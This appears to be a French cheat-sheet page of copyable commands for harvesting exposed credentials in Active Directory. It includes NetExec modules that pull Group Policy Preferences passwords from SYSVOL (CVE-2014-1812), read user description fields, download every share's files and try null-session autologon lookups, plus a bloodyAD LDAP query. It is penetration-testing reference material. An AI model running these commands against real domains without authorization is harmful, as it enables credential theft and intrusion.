Copy command
nxc smb $DC -u $USER -p $PASS -M gpp_passwordDescription: Chercher des mots de passe GPP dans SYSVOL (CVE-2014-1812, encore fréquent).
Information Gathering
Trouver des mots de passe exposés dans les descriptions, GPP, SYSVOL et configs.
nxc smb $DC -u $USER -p $PASS -M gpp_passwordDescription: Chercher des mots de passe GPP dans SYSVOL (CVE-2014-1812, encore fréquent).
nxc ldap $DC -u $USER -p $PASS -M get-desc-usersDescription: Lire le champ description de tous les utilisateurs : beaucoup contiennent des mots de passe.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --attr descriptionDescription: Alternative BloodyAD pour lire les descriptions via LDAP.
nxc smb $TARGET -u $USER -p $PASS -M spider_plus -o DOWNLOAD_FLAG=TrueDescription: Télécharger tous les fichiers des partages pour chercher des configs avec passwords.
nxc smb $DC -u '' -p '' -M gpp_autologinDescription: Chercher des identifiants autologon dans les GPP (null session).